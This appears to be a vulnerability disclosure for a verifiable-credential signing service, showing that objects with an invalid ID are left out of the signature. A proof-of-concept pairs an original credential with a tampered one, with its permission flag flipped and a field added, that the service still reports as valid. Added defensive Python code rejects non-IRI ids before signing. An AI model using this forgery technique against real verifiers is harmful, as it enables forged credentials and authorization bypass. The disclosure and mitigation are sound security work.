Block of fields is skipped from the signature when an invalid ID is presented
Summary:
When an object contains an invalid ID, all of its fields are excluded from the signing process. The same object is skipped during validation, so some modifications to that object do not affect the validity of the signature. As a result, anyone can modify those fields and still have a correctly signed verifiable presentation/credential.
Request for proof:
{
  "@context": [
    "https://www.w3.org/2018/credentials/v1",
    "https://w3id.org/security/suites/jws-2020/v1",
    "https://schema.org"
  ],
  "credentialSubject": {
    "allow": true,
    "id": "ZZZZZZZZZZ"
  },
  "issuanceDate": "2022-07-01T11:07:57.975459274Z",
  "issuer": "did:web:gaiax.vereign.com:tsa:policy:policy:example:returnDID:1.0:evaluation",
  "type": "VerifiableCredential"
}
Modified response:
{
  "@context": [
    "https://www.w3.org/2018/credentials/v1",
    "https://w3id.org/security/suites/jws-2020/v1",
    "https://schema.org"
  ],
  "credentialSubject": {
    "allow": false,
    "newField": "__additional value__",
    "id": "__modified ID__"
  },
  "issuanceDate": "2022-07-01T11:07:57.975459274Z",
  "issuer": "did:web:gaiax.vereign.com:tsa:policy:policy:example:returnDID:1.0:evaluation",
  "proof": {
    "created": "2022-07-29T11:11:30.473595161Z",
    "jws": "eyJhbGciOiJKc29uV2ViU2lnbmF0dXJlMjAyMCIsImI2NCI6ZmFsc2UsImNyaXQiOlsiYjY0Il19..MEUCIQCnULsDBVCNRH2fn_D8LG4H3kDFTqrhhIdkEafXGTylZwIgXha4OC42IbeKijP7pip05U1nFMLDH4tZowdOe0zFeTs",
    "proofPurpose": "assertionMethod",
    "type": "JsonWebSignature2020",
    "verificationMethod": "did:web:gaiax.vereign.com:tsa:policy:policy:example:returnDID:1.0:evaluation#key1"
  },
  "type": "VerifiableCredential"
}
Result:
HTTP/1.1 200 OK
date: Fri, 29 Jul 2022 08:22:14 GMT
content-type: application/json
content-length: 15
strict-transport-security: max-age=15724800; includeSubDomains

{
  "valid": true
}
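
One way to guard against this, as an added example that is not part of the original report or the project's own code: refuse any document whose "id"/"@id" value is not an absolute IRI, both before signing and before verifying, so no object can silently fall out of the signed data. The function names, the strict absolute-IRI rule and the did:example:subject-1 value are assumptions made for illustration; the REPORTED document is the credential from the report with its context list trimmed.

```python
import re

# Assumption: an id is acceptable only if it is an absolute IRI (scheme ":" rest).
ABSOLUTE_IRI = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:\S+$")
ID_KEYS = ("id", "@id")

def find_invalid_ids(node, path="$"):
    """Return (path, value) for every id/@id that is not an absolute IRI."""
    bad = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key == "@context":
                continue  # context term definitions are not node identifiers
            if key in ID_KEYS:
                if not (isinstance(value, str) and ABSOLUTE_IRI.match(value)):
                    bad.append((child, value))
            else:
                bad.extend(find_invalid_ids(value, child))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            bad.extend(find_invalid_ids(item, f"{path}[{i}]"))
    return bad

def check_before_proof(document):
    """Call before signing and before verifying; raises on any non-IRI id."""
    bad = find_invalid_ids(document)
    if bad:
        raise ValueError(f"refusing document, non-IRI id values: {bad}")
    return True

# The credential from the report (subject id is the invalid value it uses).
REPORTED = {
    "@context": ["https://www.w3.org/2018/credentials/v1"],
    "credentialSubject": {"allow": True, "id": "ZZZZZZZZZZ"},
    "issuer": "did:web:gaiax.vereign.com:tsa:policy:policy:example:returnDID:1.0:evaluation",
    "type": "VerifiableCredential",
}
# Constructed variant with a well-formed subject id.
WELL_FORMED = {**REPORTED, "credentialSubject": {"allow": True, "id": "did:example:subject-1"}}

if __name__ == "__main__":
    print(find_invalid_ids(REPORTED))
    print(check_before_proof(WELL_FORMED))
```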